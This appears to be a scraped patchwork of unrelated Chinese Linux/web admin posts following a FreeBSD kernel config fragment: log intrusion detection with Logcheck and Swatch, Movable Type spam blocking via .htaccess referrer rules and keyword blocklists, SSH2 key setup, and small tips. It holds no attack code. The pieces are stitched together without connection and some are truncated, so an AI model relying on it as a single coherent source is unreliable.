                    # output.  Adds ~128k to driver.
#device        ahd        # AHA39320/29320 and onboard AIC79xx devices
#options     AHD_REG_PRETTY_PRINT    # Print register bitfields in debug
                    # output.  Adds ~215k to driver.
#device        amd        # AMD 53C974 (Tekram DC-390(T))
#device        isp        # Qlogic family
#device     ispfw        # Firmware for QLogic HBAs- normally a module
#device        mpt        # LSI-Logic MPT-Fusion
#device        ncr        # NCR/Symbios Logic
#device        sym        # NCR/Symbios Logic (newer chipsets + those of `ncr')
#device        trm        # Tekram DC395U/UW/F DC315U adapters

#device        adv        # Advansys SCSI adapters
#device        adw        # Advansys wide SCSI adapters
#device        aha        # Adaptec 154x SCSI adapters
#device        aic        # Adaptec 15[012]x SCSI adapters, AIC-6[23]60.
#device        bt        # Buslogic/Mylex MultiMaster SCSI adapters

#device        ncv        # NCR 53C500
#device        nsp        # Workbit Ninja SCSI-3
#device        stg        # TMC 18C30/18C50

# SCSI peripherals
device        scbus        # SCSI bus (required for SCSI)
#device        ch        # SCSI media changers
device        da        # Direct Access (disks)
#device        sa        # Sequential Access (tape etc)
device        cd        # CD
#device        pass        # Passthrough device (direct SCSI access)
#device        ses        # SCSI Environmental Services (and SAF-TE)

# RAID controllers interfaced to the SCSI subsystem
#device        amr        # AMI MegaRAID
device        arcmsr        # Areca SATA II RAID
#device        asr        # DPT SmartRAID V, VI and Adaptec SCSI RAID
#device        ciss        # Compaq Smart RAID 5*
#device        dpt        # DPT Smartcache III, IV - See NOTES for options
#device        hptmv        # Highpoint RocketRAID 182x
#device        rr232x        # Highpoint RocketRAID 232x
#device        iir        # Intel Integrated RAID
#device        ips        # IBM (Adaptec) ServeRAID
#device        mly        # Mylex AcceleRAID/eXtremeRAID
#device        twa        # 3ware 9000 series PATA/SATA RAID

# RAID controllers
#device        aac        # Adaptec FSA RAID
#device        aacp        # SCSI passthrough for aac (requires CAM)
#device        ida        # Compaq Smart RAID
#device        mfi        # LSI MegaRAID SAS
#device        mlx        # Mylex DAC960 family
#device        pst        # Promise Supertrak SX6000
#device        twe        # 3ware ATA RAID

# atkbdc0 controls both the keyboard and the PS/2 mouse
device        atkbdc        # AT keyboard controller
device        atkbd        # AT keyboard
device        psm        # PS/2 mouse

device        kbdmux        # keyboard multiplexer

device        vga        # VGA video card driver

device        splash        # Splash screen and screen saver support

# syscons is the default console driver, resembling an SCO console
device        sc

# Enable this for the pcvt (VT220 compatible) console driver
#device        vt
#options     XSERVER        # support for X server on a vt console
#options     FAT_CURSOR    # start with block cursor

device        agp        # support several AGP chipsets

# Power management support (see NOTES for more options)
#device        apm
# Add suspend/resume support for the i8254.
device        pmtimer

# PCCARD (PCMCIA) support
# PCMCIA and cardbus bridge support
#device        cbb        # cardbus (yenta) bridge
#device        pccard        # PC Card (16-bit) bus
#device        cardbus        # CardBus (32-bit) bus

# Serial (COM) ports
device        sio        # 8250, 16[45]50 based serial ports

# Parallel port
#device        ppc
#device        ppbus        # Parallel port bus (required)
#device        lpt        # Printer
#device        plip        # TCP/IP over parallel
#device        ppi        # Parallel port interface device
#device        vpo        # Requires scbus and da

# If you've got a "dumb" serial or parallel PCI card that is
# supported by the puc(4) glue driver, uncomment the following
# line to enable it (connects to the sio and/or ppc drivers):
#device        puc

# PCI Ethernet NICs.
#device        de        # DEC/Intel DC21x4x (``Tulip'')
#device        em        # Intel PRO/1000 adapter Gigabit Ethernet Card
#device        ixgb        # Intel PRO/10GbE Ethernet Card
#device        txp        # 3Com 3cR990 (``Typhoon'')
#device        vx        # 3Com 3c590, 3c595 (``Vortex'')

# PCI Ethernet NICs that use the common MII bus controller code.
# NOTE: Be sure to keep the 'device miibus' line in order to use these NICs!
device        miibus        # MII bus support
#device        bce        # Broadcom BCM5706/BCM5708 Gigabit Ethernet
#device        bfe        # Broadcom BCM440x 10/100 Ethernet
#device        bge        # Broadcom BCM570xx Gigabit Ethernet
#device        dc        # DEC/Intel 21143 and various workalikes
device        fxp        # Intel EtherExpress PRO/100B (82557, 82558)
#device        lge        # Level 1 LXT1001 gigabit Ethernet
#device        msk        # Marvell/SysKonnect Yukon II Gigabit Ethernet
#device        nge        # NatSemi DP83820 gigabit Ethernet
#device        nve        # nVidia nForce MCP on-board Ethernet Networking
#device        pcn        # AMD Am79C97x PCI 10/100(precedence over 'lnc')
#device        re        # RealTek 8139C+/8169/8169S/8110S
#device        rl        # RealTek 8129/8139
#device        sf        # Adaptec AIC-6915 (``Starfire'')
#device        sis        # Silicon Integrated Systems SiS 900/SiS 7016
#device        sk        # SysKonnect SK-984x & SK-982x gigabit Ethernet
#device        ste        # Sundance ST201 (D-Link DFE-550TX)
#device        stge        # Sundance/Tamarack TC9021 gigabit Ethernet
#device        ti        # Alteon Networks Tigon I/II gigabit Ethernet
#device        tl        # Texas Instruments ThunderLAN
#device        tx        # SMC EtherPower II (83c170 ``EPIC'')
#device        vge        # VIA VT612x gigabit Ethernet
#device        vr        # VIA Rhine, Rhine II
#device        wb        # Winbond W89C840F
#device        xl        # 3Com 3c90x (``Boomerang'', ``Cyclone'')

# ISA Ethernet NICs.  pccard NICs included.
device        cs        # Crystal Semiconductor CS89x0 NIC
# 'device ed' requires 'device miibus'
#device        ed        # NE[12]000, SMC Ultra, 3c503, DS8390 cards
#device        ex        # Intel EtherExpress Pro/10 and Pro/10+
#device        ep        # Etherlink III based cards
#device        fe        # Fujitsu MB8696x based cards
#device        ie        # EtherExpress 8/16, 3C507, StarLAN 10 etc.
#device        lnc        # NE2100, NE32-VL Lance Ethernet cards
#device        sn        # SMC's 9000 series of Ethernet chips
#device        xe        # Xircom pccard Ethernet

# Wireless NIC cards
#device        wlan        # 802.11 support
#device        wlan_wep    # 802.11 WEP support
#device        wlan_ccmp    # 802.11 CCMP support
#device        wlan_tkip    # 802.11 TKIP support
#device        an        # Aironet 4500/4800 802.11 wireless NICs.
#device        ath        # Atheros pci/cardbus NIC's
#device        ath_hal        # Atheros HAL (Hardware Access Layer)
#device        ath_rate_sample    # SampleRate tx rate control for ath
#device        awi        # BayStack 660 and others
#device        ral        # Ralink Technology RT2500 wireless NICs.
#device        wi        # WaveLAN/Intersil/Symbol 802.11 wireless NICs.
#device        wl        # Older non 802.11 Wavelan wireless NIC.

# Pseudo devices.
device        loop        # Network loopback
device        random        # Entropy device
device        ether        # Ethernet support
device        sl        # Kernel SLIP
device        ppp        # Kernel PPP
device        tun        # Packet tunnel.
device        pty        # Pseudo-ttys (telnet etc)
device        md        # Memory "disks"
device        gif        # IPv6 and IPv4 tunneling
device        faith        # IPv6-to-IPv4 relaying (translation)

# The `bpf' device enables the Berkeley Packet Filter.
# Be aware of the administrative consequences of enabling this!
# Note that 'bpf' is required for DHCP.
device        bpf        # Berkeley packet filter

# USB support
device        uhci        # UHCI PCI->USB interface
device        ohci        # OHCI PCI->USB interface
device        ehci        # EHCI PCI->USB interface (USB 2.0)
device        usb        # USB Bus (required)
#device        udbp        # USB Double Bulk Pipe devices
device        ugen        # Generic
device        uhid        # "Human Interface Devices"
device        ukbd        # Keyboard
device        ulpt        # Printer
device        umass        # Disks/Mass storage - Requires scbus and da
device        ums        # Mouse
#device        ural        # Ralink Technology RT2500USB wireless NICs
#device        urio        # Diamond Rio 500 MP3 player
#device        uscanner    # Scanners
# USB Ethernet, requires miibus
#device        aue        # ADMtek USB Ethernet
#device        axe        # ASIX Electronics USB Ethernet
#device        cdce        # Generic USB over Ethernet
#device        cue        # CATC USB Ethernet
#device        kue        # Kawasaki LSI USB Ethernet
#device        rue        # RealTek RTL8150 USB Ethernet

# FireWire support
#device        firewire    # FireWire bus code
#device        sbp        # SCSI over FireWire (Requires scbus and da)
#device        fwe        # Ethernet over FireWire (non-standard!)

入侵检测之日志检测

摘要
　　入侵检测（Intrusion Detection），顾名思义，便是对入侵行为的发觉。它通过对计算机网络或计算机系统中的若干关键点收集信息并对其进行分析，从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。进行入侵检测的软件与硬件的组合便是入侵检测系统（Intrusion Detection System,简称IDS）。与其他安全产品不同的是，入侵检测系统需要更多的智能，它必须可以将得到的数据进行分析，并得出有用的结果。一个合格的入侵检测系统能大大的简化管理员的工作，保证网络安全的运行。
--------------------------------------------------------------------------------
1.概述
　　入侵检测（Intrusion Detection），顾名思义，便是对入侵行为的发觉。它通过对计算机网络或计算机系统中的若干关键点收集信息并对其进行分析，从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。进行入侵检测的软件与硬件的组合便是入侵检测系统（Intrusion Detection System,简称IDS）。与其他安全产品不同的是，入侵检测系统需要更多的智能，它必须可以将得到的数据进行分析，并得出有用的结果。一个合格的入侵检测系统能大大的简化管理员的工作，保证网络安全的运行。
　　日志是使系统顺利运行的重要保障。它会告诉我们系统发生了什么和什么没有发生。然而，由于日志记录增加得太快了，铺天盖地的日志使系统管理员茫然无措，最终使日志成为浪费大量磁盘空间的垃圾。日志具有无可替代的价值，但不幸的是它们经常被忽略，因为系统管理员在并不充裕的时间里难以查看大量的信息。标准的日志功能不能自动过滤和检查日志记录，并提供系统管理员所需要的信息。
　　对于入侵者来说，要做的第一件事就是清除入侵的痕迹。这需要入侵者获得root权限，而一旦系统日志被修改，就无法追查到攻击的情况。因此，好的系统管理员应该建立日志文件检测。有很多工具可以实现日志检测的功能，其中就有Logcheck和Swatch。本文将对Logcheck和Swatch逐一进行介绍。
2.日志文件系统
　　审计和日志功能对于系统来说是非常重要的，可以把感兴趣的操作都记录下来，供分析和检查。UNIX采用了syslog工具来实现此功能，如果配置正确的话，所有在主机上发生的事情都会被记录下来，不管是好的还是坏的。
　　Syslog已被许多日志系统采纳，它用在许多保护措施中--任何程序都可以通过syslog记录事件。Syslog可以记录系统事件，可以写到一个文件或设备中，或给用户发送一个信息。它能记录本地事件或通过网络纪录另一个主机上的事件。
　　Syslog依据两个重要的文件：/sbin/syslogd（守护进程）和/etc/syslog.conf配置文件，习惯上，多数syslog信息被写到/var/adm或/var/log目录下的信息文件中（messages.*）。一个典型的syslog纪录包括生成程序的名字和一个文本信息。它还包括一个设备和一个行为级别（但不在日志中出现）。
　　/etc/syslog.conf的一般格式如下：
　　设备.行为级别 [；设备.行为级别]　　　　记录行为
　　设备　　　　　　　　　　 描述
　　auth　　　　　　　　 认证系统：login、su、getty等，即询问用户名和口令
　　authpriv　　　　　　同LOG_AUTH，但只登录到所选择的单个用户可读的文件中
　　cron　　　　　　　　 cron守护进程
　　daemon　　　　　　　其他系统守护进程，如routed
　　kern　　　　　　　　内核产生的消息
　　lpr　　　　　　　　 打印机系统：lpr、lpd
　　mail　　　　　　　　电子邮件系统
　　news　　　　　　　　网络新闻系统
　　syslog　　　　　　　由syslogd产生的内部消息
　　user　　　　　　　　随机用户进程产生的消息
　　uucp　　　　　　　　UUCP子系统
　　local0~local7　　 为本地使用保留
　　行为级别　　　　　　　描述
　　debug　　　　　　　 包含调试的信息，通常旨在调试一个程序时使用
　　info　　　　　　　　情报信息
　　notice　　　　　　 不是错误情况，但是可能需要处理
　　warn(warning)　　 警告信息
　　err(error)　　　　 错误信息
　　crit　　　　　　　　重要情况，如硬盘错误
　　alert　　　　　　　 应该被立即改正的问题，如系统数据库破坏
　　emerg(panic)　　　 紧急情况
　　记录行为（举例）　　　　描述
　　/dev/console　　　　　发送消息到控制台
　　/var/adm/messages　　把消息写到文件/var/adm/messages
　　@loghost　　　　　　　把消息发到其它的日志记录服务器
　　fred,user1　　　　　　传送消息给用户
　　*　　　　　　　　　　　传送消息给所有的在线用户
　　有个小命令logger为syslog系统日志文件提供一个shell命令接口，使用户能创建日志文件中的条目。用法：logger 例如：logger This is a test！
　　它将产生一个如下的syslog纪录：Apr 26 11:22:34 only_you: This is a test!
　　更详细的帮助信息请man syslogd，man syslog.conf
3.Logcheck
3.1 logcheck介绍
　　Logcheck是一软件包，用来实现自动检查日志文件，以发现安全入侵和不正常的活动。Logcheck用logtail程序来记录读到的日志文件的位置，下一次运行的时候从记录下的位置开始处理新的信息。所有的源代码都是公开的，实现方法也非常简单。
　　Logcheck SHELL脚本和logtail.c程序用关键字查找的方法进行日志检测。在这儿提到的关键字就是指在日志文件中出现的关键字，会触发向系统管理员发的报警信息。Logcheck的配置文件自带了缺省的关键字，适用于大多数的*inx系统。但是最好还是自己检查一下配置文件，看看自带的关键字是否符合自己的需要。
　　Logcheck脚本是简单的SHELL程序，logtail.c程序只调用了标准的ANSI C函数。Logcheck要在cron守护进程中配置，至少要每小时运行一次。脚本用简单的grep命令来从日志文件检查不正常的活动，如果发现了就发 MAIL给管理员。如果没有发现异常活动，就不会收到MAIL。
3.2 安装和配置logcheck
3.2.1 下载Logcheck
　　下载网址:http://sourceforge.net/projects/logcheck/ 下载后放在/backup目录。
3.2.2 安装
以root用户身份登录，
　　[root@only_you /root]# tar zxvf /backup/logcheck-1.1.1.tar.gz
　　[root@only_you /root]# cd logcheck-1.1.1
　　[root@only_you logcheck-1.1.1] make linux //在Linux平台下使用
　　make install SYSTYPE=linux //缺省安装目录是/usr/local/etc
　　make[1]: Entering directory `/root/logcheck-1.1.1'
　　Making linux
　　cc -O -o ./src/logtail ./src/logtail.c
　　Creating temp directory /usr/local/etc/tmp //在/usr/local/etc下创建目录tmp
　　Setting temp directory permissions
　　chmod 700 /usr/local/etc/tmp
　　Copying files
　　cp ./systems/linux/logcheck.hacking /usr/local/etc //拷贝文件到/usr/local/etc目录
　　cp ./systems/linux/logcheck.violations /usr/local/etc
　　cp ./systems/linux/logcheck.violations.ignore /usr/local/etc
　　cp ./systems/linux/logcheck.ignore /usr/local/etc
　　cp ./systems/linux/logcheck.sh /usr/local/etc
　　cp ./src/logtail /usr/local/bin //把logtail程序拷贝到/usr/local/bin目录
　　Setting permissions
　　chmod 700 /usr/local/etc/logcheck.sh //logcheck的脚本
　　chmod 700 /usr/local/bin/logtail //修改文件访问权限，确认只有root用户才能操作
　　chmod 600 /usr/local/etc/logcheck.violations.ignore　//不同的配置文件
　　chmod 600 /usr/local/etc/logcheck.violations
　　chmod 600 /usr/local/etc/logcheck.hacking
3.2.3 程序文件介绍
　　logcheck.sh 主脚本文件。控制所有的处理过程，用grep命令检查日志文件，发现问题报告系统管理员。由cron定时启动。
　　logtail 记录日志文件上次处理到的位置。被logcheck程序调用，避免重复处理已处理过的日志文件。所有的日志文件都由此程序处理，在同一目录下会产生文件 ######.offset，其中######是检查的日志文件名。文件中记录了logtail开始处理的偏移量，如果删除掉，则从文件开始处进行处理。 Logcheck跟踪日志文件的inode号和文件大小，如果inode号发生变化，或者是文件大小比上次运行时的小， logtail会重置偏移量，处理整个文件。
　　Logcheck.hacking 文件中包含了系统受到攻击时的关键字。这个文件的关键字比较稀少，除非能知道某种特定的攻击方式的特征。缺省的关键字是ＩＳＳ（Internet Security Scanner）攻击产生的，或者是sendmail中的地址栏里的非法语法。在日志文件中找到了关键字就会给管理员发信。
　　logcheck.violations 文件中包含了产生否定或拒绝信息的系统事件。如denied，refused等。
　　logcheck.violations.ignore　文件中包含了要对logcheck.violations进行反向查找的关键字。
3.2.4 配置
　　为了使logcheck运行正常，先要对syslog.conf进行配置，你应该根据自己的需要进行配置，下面给出的只是一个例子。
　　把下面的内容加到/etc/syslog.conf中
　　#记录mail，news以外的消息
　　*.*;mail.none;news.none -/var/log/messages
　　#记录认证请求
　　auth.*;authpriv.* /var/log/authlog
　　#记录所有的内核消息
　　kern.* /var/log/kernlog
　　#记录警告和错误消息
　　*.warn;*.err /var/log/syslog
　　这四个文件/var/log/messages，/var/log/authlog，/var/log/kernlog，/var/log/syslog也就是logcheck要检查的日志文件。
　　重起syslog，［root@only_you］#/etc/rc.d/init.d/syslog restart
　　用编辑器（vi等）打开文件/usr/local/etc/logcheck.sh，在其中会找到下面的内容
　　# Linux Red Hat Version 3.x, 4.x
　　$LOGTAIL /var/log/messages > $TMPDIR/check.$$
　　$LOGTAIL /var/log/secure >> $TMPDIR/check.$$
　　$LOGTAIL /var/log/maillog >> $TMPDIR/check.$$
　　这是logcheck自带的内容，也就是logcheck要检查的日志文件，把它该为下面的内容，使之于syslog.conf的内容相一致：（应该根据你配置的syslog.conf进行修改）
　　$LOGTAIL /var/log/messages > $TMPDIR/check.$$
　　$LOGTAIL /var/log/authlog >> $TMPDIR/check.$$
　　$LOGTAIL /var/log/kernlog >> $TMPDIR/check.$$
　　$LOGTAIL /var/log/syslog >> $TMPDIR/check.$$
　　还可以找到一行为　SYSADMIN=root，指的是发邮件时的收信人，缺省为root@localhost，本机的root用户，如果机器与 Internet相连，也可以指定真实的帐号，我就把它改为了only_you@linuxaid.com.cn，这样就可以随时收到邮件了，不须用 root帐号登录到linux机器上去。
　　在/etc/crontab中增加一项，让cron定时启动logcheck。关于cron的用法请参考相应文档。
　　00,10,20,30,40,50 * * * * root /usr/local/etc/logcheck.sh
　　每10分钟运行一次。
3.2.5 测试
　　都配置好了，试试效果如何吧。登录一下，故意输错口令，看看有什么事情发生。１０分钟以后，我的only_you@linuxaid.com.cn信箱真的收到了一封信，信的内容大致如下：
　　Apr 26 13:51:13 only_you -- wap[1068]: LOGIN ON pts/1 BY wap FROM *.*.*.*
　　Apr 26 13:51:24 only_you PAM_unix[1092]: authentication failure; wap(uid=500) -> root for system-auth service
　　刚装好不长时间，logcheck就报告有人试图登录到我的机器上来，不知道这位IP为211.69.197.1的朋友想干什么。
　　Security Violations
　　=-=-=-=-=-=-=-=-=-=
　　Apr 26 15:30:53 only_you xinetd[528]: refused connect from 211.69.197.1
　　Apr 26 15:30:53 only_you xinetd[528]: refused connect from 211.69.197.1
　　Unusual System Events
　　=-=-=-=-=-=-=-=-=-=-=
　　Apr 26 15:30:53 only_you xinetd[528]: refused connect from 211.69.197.1
　　Apr 26 15:30:53 only_you xinetd[528]: refused connect from 211.69.197.1
　　Apr 26 15:30:53 only_you xinetd[528]: FAIL: ftp libwrap from=211.69.197.1
　　Apr 26 15:40:00 only_you CROND[1388]: (root) CMD (/usr/local/etc/logcheck.sh)
　　Apr 26 15:40:00 only_you CROND[1388]: (root) CMD (/usr/local/etc/logcheck.sh)
　　Apr 26 15:40:00 only_you CROND[1390]: (root) CMD ( /sbin/rmmod -as)
　　Apr 26 15:40:00 only_you CROND[1390]: (root) CMD ( /sbin/rmmod -as)
　　Apr 26 15:30:53 only_you xinetd[528]: FAIL: ftp libwrap from=211.69.197.1
4.swatch
　　SWATCH (The Simple WATCHer and filer) 是Todd Atkins开发的用于实时监视日志的PERL程序。Swatch利用指定的触发器监视日志记录，当日志记录符合触发器条件时，swatch会按预先定义好的方式通知系统管理员。
　　Swatch非常容易安装。它是一个PERL程序，无需编译。Swatch有一个很有用的安装脚本，将所有的库文件、手册页和PERL文件复制到相应目录下。安装完成后，只要创建一个配置文件，就可以运行程序了。Swatch的下载网址:http://sourceforge.net/projects/swatch/ 。下载后也放到了/backup目录。
4.1 安装
　　以root用户身份登录，
　　[root@only_you /root]# tar zxvf /backup/swatch-3.0.1.tar.gz
　　[root@only_you /root]# cd swatch-3.0.1
　　现在的版本需要perl 5和Time::HiRes, Date::Calc,Date::Format, File::Tail.模块，系统自带的perl可能不包括，没关系，它的安装程序会自己到网上去找。
　　[root@only_you swatch-3.0.1]# perl Makefile.PL
　　系统提示HiRes 1.12模块没有安装，询问是否安装，回答y，
　　接着系统提示Are you ready for manual configuration? [yes]
　　敲n就会自动配置，然后它自己到网上去装东西，具体在干什么我也不清楚了。装完这个又说缺别的东西，还是让它自己去装。试着执行一下./swatch，如果没有错误信息就说明安装成功了。
4.2 配置swatchrc
　　swathrc文件的格式如下
　　# Bad login attempts
　　watchfor /INVALID|REPEATED|INCOMPLETE/
　　echo
　　bell 3
　　mail=only_you@linuxaid.com.cn
　　# Machine room temperature
　　watchfor /WizMON/
　　echo inverse
　　bell
　　watchfor后跟/pattern/，其中的"pattern"代表一个swatch将要进行搜索匹配的正则表达式，也就是我们的触发器，下面紧跟的以“Tab”开头的是当表达式匹配时所要执行的动作，Swatch允许指定包括显示、email、呼叫或任何指定的执行文件。上面第一个watchfor的含义是找到 /INVALID|REPEATED|INCOMPLETE/后把信息显示到屏幕上，响铃，同时向only_you@linuxaid.com.cn发 MAIL。详细的正则表达式的格式请参考相应的文档。
　　缺省情况下，swatch认为swatchrc文件为~/.swatchrc，可以通过运行时指定参数来改变，如果未找到swatchrc文件，则使用缺省的配置
　　watchfor = /.*/
　　echo = random
4.3 测试
　　Swatch启动时可以带很多参数，但使用通常如下格式启动它就可以了：
　　/usr/local/bin/swatch -c /var/log/syslogrc -t /var/log/syslog &
　　-c参数用于指定配置文件，-t参数指定实时监视的日志文件，"&"使swatch在后台运行。启动后，swatch产生子进程，因此swatch是以两个进程运行的，在停止swatch时必须杀掉两个进程。
　　-t参数是用tail –f filename，从文件的末尾开始查找，如果想查找整个文件，则应该使用-f filename。
　　现在让我们来实验一下，在swatch程序所在的目录下建立swatchrc文件，内容如下：
　　watchfor = /FAILED/
　　echo=random
　　执行./swatch –c swatchrc –f /var/log/authlog，所有登录失败的记录就会显示出来，并且还用不同的颜色来显示。
　　Apr 26 17:43:34 only_you login[2344]: FAILED LOGIN 1 FROM cjm FOR dsf, Authentication failure
　　Apr 27 09:55:50 only_you login[932]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure
5.总结
　　日志是很强大的工具，然而它的大量数据也很容易淹没我们。如果我们没有足够的时间去检查数以兆计的数据时，很可能会忽略那些有用的资料。日志自动检测系统可以帮助我们解决这个问题。这些自动检测系统将我们所需要的信息实时地通知我们。希望本文能对如何定制你自己的日志文件自动检测系统有一定的帮助。
6.参考资料
[1]《An Introduction to Intrusion Detection& ASSESSMENT》ICSA, Inc.
[2] http://www.psionic.com
[3] 《The Common Intrusion Detection Framework Architecture》
Phil Porras, SRI
Dan Schnackenberg, Boeing
Stuart Staniford-Chen, UC
Davis, editor
Maureen Stillman, Oddysey Research
Felix Wu, NCSU

Mt 系统如何防止垃圾留言以及如何通过 .htaccess 禁止垃圾 refer

关于如何在Movable Type上禁止Spam(垃圾留言)，以前有朋友问起这些问题，写一个比较完整的版本在这里：

1] Spam 的工作原理
Spam 搜索网络上现有的，已知的 comment 的资源位置，例如MT的 mt-comments.cgi comment.cgi -spam，然后从中找到这些资源的URL。
或者搜索一些明显的MT的单篇日志／或者日志的位置，依据通常的做法可以猜测到那些comment.cgi 的位置。

下一步就是写一个提交cgi的程序了，然后就完事了。

注意，垃圾留言的最主要的特征是通过程序进行留言的，因此虽然有一定的智能性，但是毕竟是没有思维／视觉的程序。

2] 最简单的更名防止垃圾留言的办法：
这个是最简单的，也是最有效的。
更改Movable Type程序所使用的评论程序的文件名，也就是将默认的与mt.cgi相同路径下的mt-comments.cgi更改为其它名字。例如：
CommentScript PingLun.cgi (评论.cgi ，你可以采用任何的名子)
在lib/mt/ConifgMgr.pm文件中查找

$mgr->define('CommentScript', Default => 'mt-comments.cgi');

将其中的mt-comments.cgi改为PingLun.cgi (越复杂越好)。
然后将mt-comments.cgi 更名为 PingLun.cgi
chmod 755 PingLun.cgi
后重新rebuid整个系统。

3] 熟练级 ：mt-blacklist package
我曾经向Hedong推荐这个，因为功能非常强大，可以过滤Url，关键词，可以对以往的留言再进行过滤，也可以对Traceback进行 anti-spam

4] 专家级：Scode

这个采用了惯用的 图像文字识别码，你必需输入正确的数字才能够完成comment，这样的plugin已经完全屏蔽了垃圾留言。

5] 其它
Chedong在cnblog里提出用 robots.txt 来禁止爬虫爬 mt-comments.cgi ，当然，这样可以禁止一些，但是如果单页没有被禁止的话，仍然可以通过分析单页得到里面嵌入的form和action的动作，从而得到 comment.cgi 的资源位置。不过，这种方法的确可以有效的防止spam网址获得较高的pagerank。

下面是 更多内容关于利用.htaccess 和 httpd.conf 来精确／匹配／限止／留言和Refer的方法
这个我本来发在 www.wespoke.com里，觉得也许对这里有帮助，狗尾续貂一下。

In httpd.conf

####################################
1]
SetEnvIfNoCase Referer ".*(casino|gambling|poker|porn|sex|hqsearch|webcamss|rape).*" BadReferrer

order allow,deny
allow from all
deny from env=BadReferrer

####################################

####################################
SetEnvIfNoCase Referer ".*(casino|gambling|poker|porn|sex|hqsearch|webcamss|rape).*" BadReferrer
order deny,allow
deny from env=BadReferrer
deny from 63.81.44.2
deny from 69.50.191.130
####################################

3] 在refer 的 refer.php 里面定义黑名单:
$rcfg['exclude'][] = 'viagra';
$rcfg['exclude'][] = 'acetools';
$rcfg['exclude'][] = 'atsync';
$rcfg['exclude'][] = 'lmhsoft';
$rcfg['exclude'][] = 'direct-email-marketing-software';
$rcfg['exclude'][] = '1-bulk-email-software';
$rcfg['exclude'][] = 'mailsoft';
$rcfg['exclude'][] = 'viagra';
$rcfg['exclude'][] = 'acetools';
$rcfg['exclude'][] = 'atsync';
$rcfg['exclude'][] = 'lmhsoft';
$rcfg['exclude'][] = 'direct-email-marketing-software';
$rcfg['exclude'][] = '1-bulk-email-software';
$rcfg['exclude'][] = 'mailsoft';
$rcfg['exclude'][] = '4444';
$rcfg['exclude'][] = 'shareware-catalog';
$rcfg['exclude'][] = 'the-proxy';
$rcfg['exclude'][] = 'blogspot';
$rcfg['exclude'][] = 'xxx-database';
$rcfg['exclude'][] = 'ghettoinc';
$rcfg['exclude'][] = 'sexingitup';
$rcfg['exclude'][] = 'sex';
$rcfg['exclude'][] = 'superbowl';
$rcfg['exclude'][] = 'gabriola-island';
$rcfg['exclude'][] = 'janet-jackson';
$rcfg['exclude'][] = 'all-free-xxx';
$rcfg['exclude'][] = 'janet-jackson-picture';
$rcfg['exclude'][] = 'blogdrive';
$rcfg['exclude'][] = 'xxxwashington';
$rcfg['exclude'][] = 'sautiyakenya';
$rcfg['exclude'][] = 'excort-woman';
$rcfg['exclude'][] = 'wheelcomponents';
$rcfg['exclude'][] = '1stpromotion';
$rcfg['exclude'][] = 'clickbank-search';

博客之爽！微软发布超好软件：Windows Live Writer

微软2007年7月25日发布超好的软件：Windows Live Writer Beta！

Windows Live Writer 是一个免费的桌面应用程序，您可以使用它在网络日志（博客）中轻松发布丰富内容。

与您的网络日志服务兼容
Windows Live Writer 可以发布到 Windows Live Spaces、Sharepoint、WordPress、Blogger、LiveJournal、TypePad、Moveable Type、Community Server 以及其他众多网络日志（博客）服务。

WYSIWYG 编辑
Windows Live Writer 知道您网络日志（博客）的视觉主题。所以，您可以在发布之前，在写帖子的过程中真切地看到帖子将来的模样。再也不必浪费时间来联机预览帖子了。

丰富的媒体发布
Windows Live Writer 可使发布丰富媒体如同发送电子邮件一样轻松。插入并自定义照片、地图、标注或其他诸多酷炫的内容， 然后单击“发布”按钮即可 — 就这么简单。

强大的编辑功能
只需指尖一点，便能插入和编辑表，边键入边检查拼写以及设置内容格式和超链接内容，创建引人注目的网络日志帖子变得如此轻巧。

脱机编辑
现在您可以随时随地撰写网络日志（博客）。Windows Live Writer 可使网络日志（博客）上的草稿与您在脱机时所做的改动同步，所以您不必担心不同版本之间是否一致。

提供微软官方下载：下载 Windows Live Writer 简体中文版 5.45M

特别截图如下：

以后可以放弃Zempt了，这个比那个好用多了，赞一个。

本篇blog就是要用Windows Live Writer发布的，像大家推荐下，呵呵。

在MySQL里运行以下SQL语句可以批量替换页内链接

SQL语句的格式如下:

UPDATE `表名` SET `需要修改的字段名` = replace (`需要修改的字段名`,'被替换的内容','替换的内容') WHERE `需要修改的字段名` LIKE '%被替换的内容%'

比如我要将www.sotenet.com替换成www.vfocus.net，需要运行的SQL语句是：

UPDATE test SET hostname = replace (hostname,'www.sotenet.com','www.vfocus.net') WHERE hostname LIKE '%www.sotenet.com%';

SSH2密钥认证的实现

1、安装
[root@securitycn src]# tar zxvf ssh-3.2.9.1.tar.gz
[root@securitycn src]# cd ssh-3.2.9.1
[root@securitycn ssh-3.2.9.1]# ./configure --prefix=/usr/local/sshd2
[root@securitycn ssh-3.2.9.1]# make
[root@securitycn ssh-3.2.9.1]# make install

2、配置
在配置文件加上
AuthorizationFile authorization

3、使用scrt的publickey方式登录
1）、创建一用户，带有home目录
[root@securitycn ssh-3.2.9.1]# useradd vitter

2）、创建密钥
[root@securitycn ssh-3.2.9.1]# su vitter
$ cd ~
$ /usr/local/sshd2/bin/ssh-keygen -b 1024 ；为用户生成1024bit的KEY
会提示你输入密码，执行完后生成.ssh2子目录，下面有两个文件：
id_dsa_1024_a ；为私钥
id_dsa_1024_a.pub ；为公钥
3）、在scrt下生成密钥
在用scrt建 立session时，Authentication中的primary选择publickey,然后点击属性：
use identify file-->Create Identify File，会提示你生成密钥对。在生成的过程中鼠标要不停地移动。还会提示你输入密码，这个密码一定要记住！
4)、交换公开密钥
将scrt生成的公开密钥：
Identify.pub(默认在C:\Documents and Settings\Administrator\Application Data\VanDyke目录，也可以生成的时候手动指定目录）上传到服务器的/home/vitter/.ssh2下面
5)、在/home/vitter/.ssh2目录下建立Authorization文件和Identification文件
$ cat >Authorization
Key Identity.pub

$ cat >Identification
IdKey Identity

注：这两个文件中的公钥和私钥文件名指的是scrt中产生的文件
6)、用scrt进行连接
采用publickey的方式认证，在提示输入密码时，输入在用scrt生成密钥时的口令

Xine播放real格式的文件没声音解决办法

播放rm，rmvb没声音，据说是xine设置的问题。
编辑~/.xine/catalog.cache，找到
[/usr/local/lib/xine/plugins/1.1.4/xineplug_decode_real_audio.so]
将decoder_priority的值设为10。

为FreeBSD中的Firefox安装Flash插件

要在FreeBSD中为Firefox安装Flash插件需要以下步骤：

a) install www/linuxpluginwrapper

b) install www/linux-flashplugin7

c) cp /usr/local/share/examples/linuxpluginwrapper/libmap.conf-FreeBSD6 /etc/libmap.conf

d) ln -s /usr/local/lib/npapi/linux-flashplugin/* /usr/local/lib/firefox/plugins/

用mkisofs制作iso文件

mkisofs(make iso file system)

　　功能说明：建立ISO 9660映像文件。

